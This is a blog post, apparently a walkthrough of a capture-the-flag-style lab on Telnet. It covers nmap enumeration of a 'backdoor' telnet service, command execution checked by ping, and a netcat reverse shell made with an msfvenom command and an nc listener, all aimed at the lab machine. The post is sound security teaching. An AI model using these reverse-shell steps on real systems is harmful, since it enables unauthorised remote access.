Our development agency is committed to providing you the best service.


The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.


We pride ourselves with strong, flexible and top notch skills.


Development 90%
Design 80%
Marketing 70%


Development 90%
Design 80%
Marketing 70%


Development 90%
Design 80%
Marketing 70%


We help our clients integrate, analyze, and use their data to improve their business.










Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.


We pride ourselves on bringing a fresh perspective and effective marketing to each project.

Showing posts with label Telnet. Show all posts
Showing posts with label Telnet. Show all posts
  • All about telnet network services

    Understanding Telnet

    What is Telnet?

    Telnet is an application protocol which allows you, with the use of a telnet client, to connect to and execute commands on a remote machine that's hosting a telnet server. All about telnet network services

    The telnet client will establish a connection with the server. The client will then become a virtual terminal- allowing you to interact with the remote host.





    Telnet sends all messages in clear text and has no specific security mechanisms. Thus, in many applications and services, Telnet has been replaced by SSH in most implementations.

    How does Telnet work?

    The user connects to the server by using the Telnet protocol, which means entering "telnet" into a command prompt. The user then executes commands on the server by using specific Telnet commands in the Telnet prompt. You can connect to a telnet server with the following syntax: "telnet [ip] [port]"

    #1 What is Telnet?   

    Ans :- Application Protocol

    #2 What has slowly replaced Telnet?   

    Ans :- SSH

    #3 How would you connect to a Telnet server with the IP on port 23?

    Ans :- telnet 23

    #4 The lack of what, means that all Telnet communication is in plaintext?

    Ans :- encryption

    Enumerating Telnet

    Lets Get Started

    Before we begin, make sure to deploy the room and give it some time to boot. Please be aware, this can take up to five minutes so be patient!


    We've already seen how key enumeration can be in exploiting a misconfigured network service. However, vulnerabilities that could be potentially trivial to exploit don't always jump out at us. For that reason, especially when it comes to enumerating network services, we need to be thorough in our method.

    Port Scanning

    Let's start out the same way we usually do, a port scan, to find out as much information as we can about the services, applications, structure and operating system of the target machine. Scan the machine with nmap and the tag -A and -p-.


    -A : Enables OS Detection, Version Detection, Script Scanning and Traceroute all in one

    -p- : Enables scanning across all ports, not just the top 1000


    Let's see what's going on on the target server...

    #1 How many ports are open on the target machine?   

    #2 What port is this?

    #3 This port is unassigned, but still lists the protocol it's using, what protocol is this?    

    #4 Now re-run the nmap scan, without the -p- tag, how many ports show up as open?

    #5 Here, we see that by assigning telnet to a non-standard port, it is not part of the common ports list, or top 1000 ports, that nmap scans. It's important to try every angle when enumerating, as the information you gather here will inform your exploitation stage.

    Based on the title returned to us, what do we think this port could be used for?

    #7 Who could it belong to? Gathering possible usernames is an important step in enumeration.

    #8 Always keep a note of information you find during your enumeration stage, so you can refer back to it when you move on to try exploits.

    Exploiting Telnet

    Types of Telnet Exploit

    Telnet, being a protocol, is in and of itself insecure for the reasons we talked about earlier. It lacks encryption, so sends all communication over plaintext, and for the most part has poor access control. There are CVE's for Telnet client and server systems, however, so when exploiting you can check for those on:

    •     https://www.cvedetails.com/
    •     https://cve.mitre.org/

    A CVE, short for Common Vulnerabilities and Exposures, is a list of publicly disclosed computer security flaws. When someone refers to a CVE, they usually mean the CVE ID number assigned to a security flaw.

    However, you're far more likely to find a misconfiguration in how telnet has been configured or is operating that will allow you to exploit it.

    Method Breakdown

    So, from our enumeration stage, we know:
    •     - There is a poorly hidden telnet service running on this machine
    •     - The service itself is marked "backdoor"
    •     - We have possible username of "Skidy" implicated

    Using this information, let's try accessing this telnet port, and using that as a foothold to get a full reverse shell on the machine!

    Connecting to Telnet

    You can connect to a telnet server with the following syntax:

    "telnet [ip] [port]"

    We're going to need to keep this in mind as we try and exploit this machine.



    What is a Reverse Shell?

    A "shell" can simply be described as a piece of code or program which can be used to gain code or command execution on a device.
    A reverse shell is a type of shell in which the target machine communicates back to the attacking machine.

    The attacking machine has a listening port, on which it receives the connection, resulting in code or command execution being achieved.

    #1 Okay, let's try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above.

    #2 Great! It's an open telnet connection! What welcome message do we receive?

    #3 Let's try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)

    #4 Hmm... that's strange. Let's check to see if what we're typing is being executed as a system command.

    #5 Start a tcpdump listener on your local machine using: "sudo tcpdump ip proto \\icmp -i tun0" This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.

    #6 Now, use the command "ping [local tun0 ip] -c 1" through the telnet session to see if we're able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)

    #7 Great! This means that we are able to execute system commands AND that we are able to reach our local machine. Now let's have some fun!

    #8 We're going to generate a reverse shell payload using msfvenom.This will generate and encode a netcat reverse shell for us. Here's our syntax:
    "msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R"

    • -p = payload
    • lhost = our local host IP address
    • lport = the port to listen on
    • R = export the payload in raw format

    What word does the generated payload start with?

    #9 Perfect. We're nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:

    "nc -lvp [listening port]"

    What would the command look like for the listening port we selected in our payload?

    #10 Great! Now that's running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully- this will give us a shell on the target machine!

    #11 Success! What is the contents of flag.txt?

    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)


    We've been developing corporate tailored services for clients for 30 years.


    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.